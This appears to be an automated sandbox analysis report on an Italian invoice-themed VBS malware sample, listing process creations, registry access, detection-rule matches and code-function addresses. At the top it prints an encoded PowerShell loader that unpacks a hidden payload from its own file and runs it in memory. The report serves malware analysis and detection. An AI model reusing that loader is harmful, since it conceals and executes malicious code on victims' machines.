                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

                System Summary

                barindex
                Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A035480 NtProtectVirtualMemory,7_2_0A035480
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A036D08 NtResumeThread,7_2_0A036D08
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A035478 NtProtectVirtualMemory,7_2_0A035478
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A036D00 NtResumeThread,7_2_0A036D00
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE6D08 NtResumeThread,15_2_09CE6D08
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE5480 NtProtectVirtualMemory,15_2_09CE5480
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE6D00 NtResumeThread,15_2_09CE6D00
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE5478 NtProtectVirtualMemory,15_2_09CE5478
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_02F9AA897_2_02F9AA89
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_02F9EA607_2_02F9EA60
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_02F9AA897_2_02F9AA89
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_02F9EDE87_2_02F9EDE8
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A03F8B87_2_0A03F8B8
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A031D707_2_0A031D70
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A03F8AA7_2_0A03F8AA
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A032CA07_2_0A032CA0
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A0E00067_2_0A0E0006
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A0E00407_2_0A0E0040
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A35E2887_2_0A35E288
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A3400067_2_0A340006
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 7_2_0A3400407_2_0A340040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A51C009_2_00A51C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A534169_2_00A53416
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A548709_2_00A54870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A551C09_2_00A551C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A551D09_2_00A551D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A519789_2_00A51978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A5426C9_2_00A5426C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A51FA99_2_00A51FA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A51F949_2_00A51F94
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A51FCA9_2_00A51FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00A51C009_2_00A51C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02342B689_2_02342B68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02342B479_2_02342B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023D90109_2_023D9010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023D098D9_2_023D098D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DD7689_2_023DD768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023D90009_2_023D9000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DD96D9_2_023DD96D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DCF609_2_023DCF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DD7589_2_023DD758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023DCF509_2_023DCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_023D2FF29_2_023D2FF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0497B8209_2_0497B820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04975B189_2_04975B18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0497A7BF9_2_0497A7BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0497D8D09_2_0497D8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0497D8C19_2_0497D8C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0497B80F9_2_0497B80F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C37C5F9_2_04C37C5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C3D1979_2_04C3D197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C38D089_2_04C38D08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04C37F979_2_04C37F97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F274E09_2_04F274E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2E1F29_2_04F2E1F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F29D289_2_04F29D28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2D8809_2_04F2D880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2A9409_2_04F2A940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2FA009_2_04F2FA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F274D09_2_04F274D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2348B9_2_04F2348B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F275F79_2_04F275F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F275549_2_04F27554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2451C9_2_04F2451C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F266689_2_04F26668
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F266589_2_04F26658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2778F9_2_04F2778F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2A0709_2_04F2A070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F23F6E9_2_04F23F6E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2D87F9_2_04F2D87F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F278339_2_04F27833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F248179_2_04F24817
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2F9F19_2_04F2F9F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F23A609_2_04F23A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0552C0C89_2_0552C0C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_056913679_2_05691367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_056913789_2_05691378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05697DE89_2_05697DE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05697DD79_2_05697DD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B8A89_2_0668B8A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_066811D09_2_066811D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06684EEB9_2_06684EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668468E9_2_0668468E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668AF209_2_0668AF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B47B9_2_0668B47B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B4749_2_0668B474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B45B9_2_0668B45B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668AC309_2_0668AC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B2609_2_0668B260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668B2709_2_0668B270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_066892D99_2_066892D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0668937C9_2_0668937C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_066893729_2_06689372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_066893AA9_2_066893AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0675D6F09_2_0675D6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0675EF089_2_0675EF08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06752F8F9_2_06752F8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0675E4C09_2_0675E4C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0675423C9_2_0675423C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067562389_2_06756238
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067523989_2_06752398
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06756C719_2_06756C71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_06756C809_2_06756C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067562289_2_06756228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067563199_2_06756319
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_0675BBF89_2_0675BBF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067581679_2_06758167
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F176A9_2_067F176A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F1FE09_2_067F1FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F65609_2_067F6560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F6D909_2_067F6D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067FFBA09_2_067FFBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F49789_2_067F4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F89A09_2_067F89A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067FDE219_2_067FDE21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F1FD09_2_067F1FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067FFC3C9_2_067FFC3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067FD4A89_2_067FD4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F0D609_2_067F0D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F654F9_2_067F654F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F6D809_2_067F6D80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F0A929_2_067F0A92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F0B3B9_2_067F0B3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F0B9B9_2_067F0B9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067FFB909_2_067FFB90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F00409_2_067F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F38109_2_067F3810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F98B89_2_067F98B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F49699_2_067F4969
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F39209_2_067F3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F39199_2_067F3919
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F79E09_2_067F79E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F79D09_2_067F79D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F71939_2_067F7193
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_067F718A9_2_067F718A
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_042DAA6C15_2_042DAA6C
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_042DEA4015_2_042DEA40
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_042DEDC815_2_042DEDC8
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_042DAA6C15_2_042DAA6C
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CA004015_2_09CA0040
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CA002415_2_09CA0024
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB099815_2_09CB0998
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB099415_2_09CB0994
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB595415_2_09CB5954
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB596015_2_09CB5960
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB5D2E15_2_09CB5D2E
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CB0CB915_2_09CB0CB9
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE1D7015_2_09CE1D70
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CE2CA015_2_09CE2CA0
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CEF8A815_2_09CEF8A8
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_09CEF8B815_2_09CEF8B8
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_0A11E28815_2_0A11E288
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_0A10000715_2_0A100007
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 15_2_0A10004015_2_0A100040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_01541C0017_2_01541C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0154197817_2_01541978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0154196717_2_01541967
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_015451D017_2_015451D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_015451C017_2_015451C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0154487017_2_01544870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0154341617_2_01543416
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_01541C0017_2_01541C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_01541FCA17_2_01541FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_01541F9417_2_01541F94
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_01541FA917_2_01541FA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0154426C17_2_0154426C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05602B6817_2_05602B68
